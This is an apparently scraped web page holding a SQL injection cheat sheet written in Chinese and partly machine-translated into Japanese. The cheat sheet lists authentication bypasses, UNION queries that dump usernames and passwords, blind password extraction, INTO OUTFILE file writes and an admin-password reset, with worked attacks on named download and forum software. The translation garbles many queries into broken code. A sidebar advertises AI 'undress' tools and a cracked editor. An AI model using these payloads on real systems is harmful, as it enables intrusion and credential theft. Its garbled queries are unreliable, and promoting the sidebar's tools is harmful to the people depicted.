' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)
' and LENGTH(password)='6(探测密码长度)
' and LEFT(password,1)='m
' and LEFT(password,2)='my
…………………………依次类推
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* (可以是1或者=后直接跟)
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt (导出文件)
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 12
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END
例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹 变换id进行测试(meteor)
union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
构造语句:
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
UNION%20(SELECT%201,0,2,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate (查沙子的id)
(SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM……(字段和数据库相同情况下,可直接提交)
SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM……(不同的情况下)
特殊技巧:在表单,搜索引擎等地方写:
“___”
“.__ ”
“%
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#
$command = "ディレクトリ:";システム($command);
SELECT * FROM 記事 WHERE 記事 ID='$id'
SELECT * FROM 記事 WHERE 記事 ID=$id
1' と 1=2 Union select * from user where userid=1/* 句中变
(SELECT * FROM 記事WHERE Articleid='1' and 1=2 Union select * from user where userid=1/*')
1 and 1=2 Union select * from user where userid=1
语句 形式:建立一个库,插入:
CREATE DATABASE `injection`
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL デフォルト '',
`password` varchar(20) NOT NULL デフォルト ' ',
主キー (`userid`)
) ;
INSERT INTO `user` VALUES (1, 'swap', 'mypass');
插例一注册用户:
INSERT INTO `user` (ユーザーID、ユーザー名、パスワード、ホームページ、ユーザーレベル) VALUES ('', '$username', '$password', '$homepage', '1') ;
「メンバー (ログイン、パスワード、名前、メールアドレス、ユーザーレベル) の値に挿入 ('$login','$pass','$nom','$email','1')」;
メンバーに挿入 (ログイン) ,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
"メンバーに挿入 SET login='$login',password=' $pass',nom='$nom',email='$email'";
INSERT INTO member SET login='',password='',nom='',userlevel='3',email=''
"INSERT INTO member VALUES ('$id','$login','$pass','$nom','$email','1')";
ユーザー設定パスワード='$password'を更新、ホームページ='$homepage' WHERE id='$id'
UPDATE ユーザー設定パスワード='MD5(mypass)' WHERE username='admin'#)'、ホームページ='$homepage' WHERE id='$id'
"UPDATEメンバー SET パスワード='$pass',nom='$nom',email='$email' WHERE id='$id'";
UPDATE メンバー SET パスワード='[PASS]',nom='',userlevel= '3',email=' ' WHERE id='[ID]'
"UPDATE news SET Votes=Votes+1, core=score+$note WHERE idnews='$id'";
长用関数数:
DATABASE( )
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比例:
UPDATE 記事 SET title=$title WHERE 記事id=1 对应関数関数
UPDATE 記事 SET title=DATABASE() WHERE id=1
#把現在のデータベース库名更新からタイトルフィールド
UPDATE 記事 SET title=USER() WHERE id=1
#握る当前 MySQL 用户名更新からタイトルフィールド
UPDATE 記事 SET title=SYSTEM_USER() WHERE id=1
#握る当前 MySQL 用户名前更新からタイトルフィールド
UPDATE 記事 SET title=SESSION_USER() WHERE id=1
#握る当前の MySQL 用户名更新からタイトルフィールド
UPDATE 記事 SET title=CURRENT_USER() WHERE id=1
#握る当前の会话被验证適合の用户名更新からタイトルフィールド
:::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::
$req = "SELECT * FROM メンバー WHERE name LIKE '%$search %' 名前順に並べ替えます";
SELECT * FROM メンバー WHERE 名前 LIKE '%%' ORDER BY uid#%' ORDER BY 名前
SELECT * FROM メンバー WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY 名前
SELECT uid FROM admins WHERE login= '' OR 'a'='a' AND passwd='' OR 'a'='a' (经典)
SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND passwd=''
SELECT * FROM テーブル WHERE msg LIKE '%hop'
SELECT uid FROM メンバー WHERE ログイン = 'Bob' AND パスワード LIKE 'a%'#' AND パスワード=''
SELECT * FROM メンバー WHERE 名前 LIKE '%%' ORDER BY uid# %' 名前で注文
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
DVWA
Damn Vulnerable Web App (DVWA) は、非常に脆弱な PHP/MySQL Web アプリケーションです。その主な目的は、セキュリティ専門家が法的環境でスキルとツールをテストするのに役立ち、Web 開発者が Web アプリケーションを保護するプロセスをより深く理解できるようにし、教師/生徒が教室環境で Web アプリケーションを教え/学習できるようにすることです。安全。 DVWA の目標は、シンプルでわかりやすいインターフェイスを通じて、さまざまな難易度で最も一般的な Web 脆弱性のいくつかを実践することです。このソフトウェアは、
SublimeText3 中国語版
中国語版、とても使いやすい
mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。
EditPlus 中国語クラック版
サイズが小さく、構文の強調表示、コード プロンプト機能はサポートされていません
